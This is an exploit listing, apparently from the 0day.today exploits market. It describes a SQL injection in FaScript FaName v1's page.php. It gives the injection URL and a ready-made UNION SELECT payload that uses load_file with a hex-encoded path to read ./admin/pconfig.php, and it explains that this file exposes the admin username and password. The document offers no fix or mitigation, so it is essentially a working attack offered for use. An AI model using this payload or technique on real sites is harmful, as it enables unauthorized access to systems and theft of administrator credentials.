[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FaScript FaName v1 (page.php) Remote SQL Injection Vulnerability

Author
IRCRASH
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2500
Category
web applications
Date add
15-01-2008
Platform
unsorted
================================================================
FaScript FaName v1 (page.php) Remote SQL Injection Vulnerability
================================================================



#####################################################################################
####                FaScript FaName v1 Remote Sql Injection                      ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#Script Download : http://www.hotscripts.com/Detailed/66472.html                    #
#                                                                                   #
#Injection Adress :  http://Sitename/faname/page.php?id=<SqL Code>                  #
#                                                                                   #
#Help : In This Script Admin Username and Password Save in ./admin/pconfig.php      #
#       You can open this file with load_file Function in mysql and see admin       #
#       Username and password in Page Source                                        #
#                                                                                   #
# ./admin/pconfig.php Str2Hex : 0x2e2f61646d696e2f70636f6e6669672e706870            #
#                                                                                   #
#SQL Code for pconfig.php : 999999'%20union/**/select/**/0,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),2,3/**/from/**/mysql.user/*
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################



#  0day.today [2024-12-25]  #